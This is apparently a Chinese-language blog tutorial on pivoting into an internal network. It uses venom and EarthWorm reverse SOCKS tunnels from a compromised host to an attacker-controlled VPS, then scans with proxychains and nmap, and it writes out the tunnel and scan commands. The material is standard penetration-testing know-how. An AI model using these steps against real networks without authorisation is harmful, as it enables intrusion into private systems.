porxychains+socks5+nmap扫描内网


一、前言

最近学习到了内网代理,就是想用在nmap来扫远程内网的中的主机。没想到就碰到了proxychains代理工具,正是因为这些工具的碰撞,让我在内网中得心应手。

总之:porxychains+任意socks5代理工具来实现nmap扫描内网

环境准备:kali(在内网虚拟中)、公网vps(自备)、可控可访问公网的内网主机(作为跳板)、内网不可控不可访问公网的主机
ps:没有vps的赶紧买一个(ali、tx),趁还没到24岁,白嫖起来

porxychains初始化配置:
(1)默认的ProxyChains不太能够满足我们进行内网nmap扫描,所以需要修改一些配置,首先找一下配置的文件的位置:locate proxychains

第一个就是配置文件
(2)编辑一下

(3)需要用#注释掉proxy_dns

(4)找到添加代理地址的位置

就是这里,等等需要把vps地址添加到下面

二、ProxyChains+venom

1、思路

感觉这个组合是适合实际环境的,venom的主控制台放在vps上,通过漏洞拿下的内网服务器作为节点连接到vps。接着在vps进入到子节点中,然后开启socks,最后在proxychains配置socks list即可。

2、开启主控制台

在虚拟机里面是代理并扫描成功了,但是还想去自己的vps上试试有没有效果,毕竟多实践实践有好处的。
(1)打开vps上传admin文件

(2)给写的权限chmod +x admin_linux_x64

(3)开启本地监听./admin_linux_x64 -lport 9999

(4)可以指定端口9999扫描一下确认是否开启成功

3、节点配置

(1)这时候来到我们已经控制住的内网,去连接vps主控制台agent.exe -rhost ip -rport 9999

(2)vps上面看看

已经有节点添加进来了,玩弄一下

发现内网ip段,所以nmap的目标也有了

4、开启socks

(1)玩够了,就退出来

(2)开启socks
socks 55566

5、nmap扫描

(1)扫描之前需要先去proxychains的配置文件中把代理地址加上去

(2)代理成功后,目前没有发现比较好的方法,来扫描网段中存活的主机,(挖坑)因为不管用啥参数扫描网段的结果总是不太理想。

更新(填坑):经过一天的反复思考和一些实践发现是防火墙的问题,由于自己懒就没在vps上测,结果在本机复现的时候防火墙没关(当作公网主机的防火墙)导致之前怎么测都不理想。关了防火墙一下就出来了这里就不贴结果了。

下面我决定用vps试试扫描主机存活是不是好用的,socks5不支持icmp协议所以无法用ping测试主机存活情况,就选择用-p 接上常用端口80 445这样的,但是也不一定,这里就用80了:proxychains nmap -sT -p 80 192.168.19.1/24

结果是能扫到的,但是时间太慢了,还是得挖坑,怎么去提高速度

(3)继续扫描端口,由于socks是支持tcp 所以使用-sT,proxychains nmap -sT 192.168.19.128

三、ProxyChains+ EarthWorm

1、思路

思路差不多,但是命令不一样。首先需要在vps开一个监听端口和一个socks端口,然后内网机器连接到监听端口。

2、开启主控制台

(1)上传ew文件到vps上,并且给可执行的权限

(2)开启服务
./ew_for_linux64 -s rcsocks -l 1080 -e 8888

3、内网连接

(1)内网主机去主动连接vps的8888端口
ew_for_Win.exe -s rssocks -d ip-e 8888

(2)vps监听成功

4、nmap扫描

(1)扫描前先挂代理测试一下

访问成功,并且vps上面也有反应

(2)把代理地址添加到proxychains中,这里就直接扫一下目标主机了
proxychains nmap -sT -p 80,3389,445 192.168.19.128


文章作者: xi3w3n
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 xi3w3n !
评论
  目录